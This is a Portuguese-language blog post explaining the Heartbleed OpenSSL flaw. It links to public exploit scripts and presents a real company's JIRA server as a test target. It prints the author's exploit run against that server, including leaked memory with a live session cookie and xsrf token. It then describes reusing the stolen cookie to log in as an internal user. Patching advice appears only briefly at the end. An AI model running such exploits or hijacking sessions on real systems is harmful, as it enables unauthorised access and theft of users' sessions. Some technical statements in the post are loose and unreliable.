Percebi um alvoroço em relação a CVE-2014-0160 que saiu na segunda-feira sobre uma vulnerabilidade no OpenSSL que é uma biblioteca de criptografia que funciona para comunicação privada/segura através da internet. Essa biblioteca é usada para manter uma privacidade de dados que são trafegados entre um cliente e um servidor. Ex: Se eu mando um email a partir de um webmail com OpenSSL todo o tráfego não poderia ser interceptado, não até agora. Traduzindo… O OpenSSL a grosso modo verifica se você é realmente quem diz ser.

 

Essa vulnerabilidade é conhecida como Heartbleed (em outros lugares está: HeartBeat), permite que o invasor roube as chaves que protegem a comunicação entre cliente, senhas de usuários que estão alocadas na memória do servidor. Isso representa um grande risco para grandes empresas, inclusive grandes corporações como o RedTube. Abaixo deixo o link para um top 10.000 de sites que foram escaneados ontem dia 08 de abril.

Segundo especialistas os ataques são difíceis de detectar, mas a vulnerabilidade não, então… Pouco pode ser feito, inclusive a única solução que muitas empresas como Amazon, Microsoft e Ebay estão realizando, é revogar os certificados digitais.

Os scripts disponíveis na internet para explorar essa vulnerabilidade são extremamente fáceis de executar, basta uma coisa… saber ler. Você pode ver esses dois scripts no Exploit-DB.

http://www.exploit-db.com/exploits/32745/

http://www.exploit-db.com/exploits/32764/

Para verificar se o site possui vulnerabilidade você pode testar no seguinte link:

http://filippo.io/Heartbleed/

Deixo aqui um server vulnerável para testes: https://jira.atlassian.com/secure/Dashboard.jspa

É um servidor que verifica rastreamento de tickets. A seguir você pode ver a saída, foram retiradas saídas hex para ver melhor o código:

 [eddyoliveira@securityattack ~]# python heartbleed.py jira.atlassian.com  Connecting...  Sending Client Hello...  Waiting for Server Hello...  ... received message: type = 22, ver = 0302, length = 66  ... received message: type = 22, ver = 0302, length = 3239  ... received message: type = 22, ver = 0302, length = 331  ... received message: type = 22, ver = 0302, length = 4  Sending heartbeat request...  ... received message: type = 24, ver = 0302, length = 16384  Received heartbeat response:
[email protected] /browse/  en_US-cubysj-198  8229788/6160/11/
(lots of garbage)
..............Ac  cept-Encoding: g  zip,deflate,sdch  ..Accept-Languag  e: en-US,en;q=0.  8..Cookie: atlas  sian.xsrf.token=  BWEK-0C0G-BSN7-V  OZ1|3d6d84686dc0  f214d0df1779cbe9  4db6047b0ae5|lou  t; JSESSIONID=33  F4094F68826284D1  8AA6D7ED1D554E..  ..E.$3Z.l8.M..e5  ..6D7ED1D554E...  ......*..?.e.b..

O cookie JSESSIONID serve para o servidor JIRA ver se você está autenticado na sua sessão HTTP. Então se eu editar os cookies para os cookies capturados a partir de plugin do chrome, posso dizer que sou um usuário autenticado e o JIRA não irá negar nada.

Após editar o cookie com o seguinte programa, é só salvar e recarregar a página e você já estará logado como usuário.

Como você pode ver acima, uma vez que temos tido um cookie ID sessão válida, podemos acessar o JIRA como funcionário interno. A única maneira de detectar esses ataques é verificando os IP’s de origem.

Servidores nginx estão sendo afetados mais que apache, mesmo assim o viável a se fazer agora é instalar os patch’s de atualização e/ou revogar seus certificados. Espero que tenham compreendido mais sobre a falha, abraços e até a próxima.

fonte: http://securityattack.com.br/